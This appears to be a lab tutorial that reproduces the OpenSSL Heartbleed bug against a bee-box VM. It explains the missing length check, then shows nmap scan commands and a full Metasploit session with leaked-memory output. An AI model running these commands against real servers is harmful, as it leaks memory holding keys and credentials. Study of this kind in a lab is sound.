Reproducing the Heartbleed vulnerability
Cause of the vulnerability
When handling a TLS heartbeat request, OpenSSL passed the payload length field taken from the peer's request straight to memcpy() without first checking it against the amount of data actually received. An attacker can therefore declare a payload of up to 64 KB while sending almost nothing: OpenSSL copies that many bytes out of the buffer it allocated, well past the end of the real request, into the heartbeat response and sends it back. Each such request leaks up to 64 KB of the victim's memory.
Reproduction process
Preparation
kali:192.168.239.131
bee-box:192.168.239.138
Starting the reproduction
Ping bee-box from kali to check connectivity.
Then run nmap -O to check whether port 8443 is open.
Then use nmap's ssl-heartbleed.nse script to check whether the vulnerability is present:
nmap -sV -p 8443 --script ssl-heartbleed.nse 192.168.239.138
The vulnerability is present; next, use msf to exploit it.
root@192:~# msfconsole
       =[ metasploit ]
+ -- --=[ 2076 exploits - 1124 auxiliary - 352 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]
Metasploit tip: Metasploit can be configured at startup, see msfconsole --help to learn more
msf6 > search heartbleed
Matching Modules
================

   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/ssl/openssl_heartbleed          2014-04-07       normal  Yes    OpenSSL Heartbeat (Heartbleed) Information Leak
   1  auxiliary/server/openssl_heartbeat_client_memory  2014-04-07       normal  No     OpenSSL Heartbeat (Heartbleed) Client Memory Exposure

Interact with a module by name or index. For example info 1, use 1 or use auxiliary/server/openssl_heartbeat_client_memory
msf6 > use auxiliary/scanner/ssl/openssl_heartbleed
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > show options
Module options (auxiliary/scanner/ssl/openssl_heartbleed):

   Name              Current Setting  Required  Description
   ----              ---------------  --------  -----------
   DUMPFILTER                         no        Pattern to filter leaked memory before storing
   LEAK_COUNT        1                yes       Number of times to leak memory per SCAN or DUMP invocation
   MAX_KEYTRIES      50               yes       Max tries to dump key
   RESPONSE_TIMEOUT  10               yes       Number of seconds to wait for a server response
   RHOSTS                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT             443              yes       The target port (TCP)
   STATUS_EVERY      5                yes       How many retries until key dump status
   THREADS           1                yes       The number of concurrent threads (max one per host)
   TLS_CALLBACK      None             yes       Protocol to use, "None" to use raw TLS sockets (Accepted: None, SMTP, IMAP, JABBER, POP3, FTP, POSTGRES)
   TLS_VERSION       1.0              yes       TLS/SSL version to use (Accepted: SSLv3, 1.0, 1.1, 1.2)

Auxiliary action:

   Name  Description
   ----  -----------
   SCAN  Check hosts for vulnerability
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rhost 192.168.239.138
rhost => 192.168.239.138
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set rport 8443
rport => 8443
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > set verbose true
verbose => true
msf6 auxiliary(scanner/ssl/openssl_heartbleed) > run
[*] 192.168.239.138:8443 - Leaking heartbeat response #1
[*] 192.168.239.138:8443 - Sending Client Hello...
[*] 192.168.239.138:8443 - SSL record #1:
[*] 192.168.239.138:8443 - Type: 22
[*] 192.168.239.138:8443 - Version: 0x0301
[*] 192.168.239.138:8443 - Length: 86
[*] 192.168.239.138:8443 - Handshake #1:
[*] 192.168.239.138:8443 - Length: 82
[*] 192.168.239.138:8443 - Type: Server Hello (2)
[*] 192.168.239.138:8443 - Server Hello Version: 0x0301
[*] 192.168.239.138:8443 - Server Hello random data: 62202699b1eeba384c601bfa314e64ac091a7553f2a15a7aa567f552654ca23e
[*] 192.168.239.138:8443 - Server Hello Session ID length: 32
[*] 192.168.239.138:8443 - Server Hello Session ID: 96ae86840850e9cb77ceabcf847ce4309d3abd9e2cf53e50c1b0a9845e524383
[*] 192.168.239.138:8443 - SSL record #2:
[*] 192.168.239.138:8443 - Type: 22
[*] 192.168.239.138:8443 - Version: 0x0301
[*] 192.168.239.138:8443 - Length: 675
[*] 192.168.239.138:8443 - Handshake #1:
[*] 192.168.239.138:8443 - Length: 671
[*] 192.168.239.138:8443 - Type: Certificate Data (11)
[*] 192.168.239.138:8443 - Certificates length: 668
[*] 192.168.239.138:8443 - Data length: 671
[*] 192.168.239.138:8443 - Certificate #1:
[*] 192.168.239.138:8443 - Certificate #1: Length: 665
[*] 192.168.239.138:8443 - Certificate #1: #<OpenSSL::X509::Certificate: subject=#<OpenSSL::X509::Name emailAddress=bwapp@itsecgames.com,CN=bee-box.bwapp.local,OU=IT,O=MME,L=Menen,ST=Flanders,C=BE>, issuer=#<OpenSSL::X509::Name emailAddress=bwapp@itsecgames.com,CN=bee-box.bwapp.local,OU=IT,O=MME,L=Menen,ST=Flanders,C=BE>, serial=#<OpenSSL::BN:0x00005582db39cb88>, not_before=2013-04-14 18:11:32 UTC, not_after=2018-04-13 18:11:32 UTC>
[*] 192.168.239.138:8443 - SSL record #3:
[*] 192.168.239.138:8443 - Type: 22
[*] 192.168.239.138:8443 - Version: 0x0301
[*] 192.168.239.138:8443 - Length: 203
[*] 192.168.239.138:8443 - Handshake #1:
[*] 192.168.239.138:8443 - Length: 199
[*] 192.168.239.138:8443 - Type: Server Key Exchange (12)
[*] 192.168.239.138:8443 - SSL record #4:
[*] 192.168.239.138:8443 - Type: 22
[*] 192.168.239.138:8443 - Version: 0x0301
[*] 192.168.239.138:8443 - Length: 4
[*] 192.168.239.138:8443 - Handshake #1:
[*] 192.168.239.138:8443 - Length: 0
[*] 192.168.239.138:8443 - Type: Server Hello Done (14)
[*] 192.168.239.138:8443 - Sending Heartbeat...
[*] 192.168.239.138:8443 - Heartbeat response, 13027 bytes
[+] 192.168.239.138:8443 - Heartbeat response with leak, 13027 bytes
[*] 192.168.239.138:8443 - Printable info leaked:
…b…[…K~#.Mu…@…%....f.....".!.9.8.........5.............................3.2.....E.D...../...A.........................................c.v...........R.z.....3.J...0...h.6.E.a.......&...4. ...g..b…d…|…k.s…2…>…w.Y.A…e.7…F…w.[…K…i.O…P…=.d…P…j…;…p…U…0.}.B.’…e.;…’.#.T…F.&…x…-…Z…~.G…X…<…@…D… …Q…~…{.y…^.t.s.I.,.q.n…o.m.l.k.j.V.i….g.f......g.f......g.f.....…a.u.y…Z…C.Y./.?.X…9.W…V.T….<…Q.O.+…%.J.2…E…D.C.A…@.=.H…4.R.M.#.5…:.6.h…5.m…/…-.%…)…L.".!..N…:…l…r…(…x…f…S…]…t.1…c.b.S.>.9.7.3… repeated 11974 times …
[*] 192.168.239.138:8443 - Scanned 1 of 1 hosts (100% complete)
Summary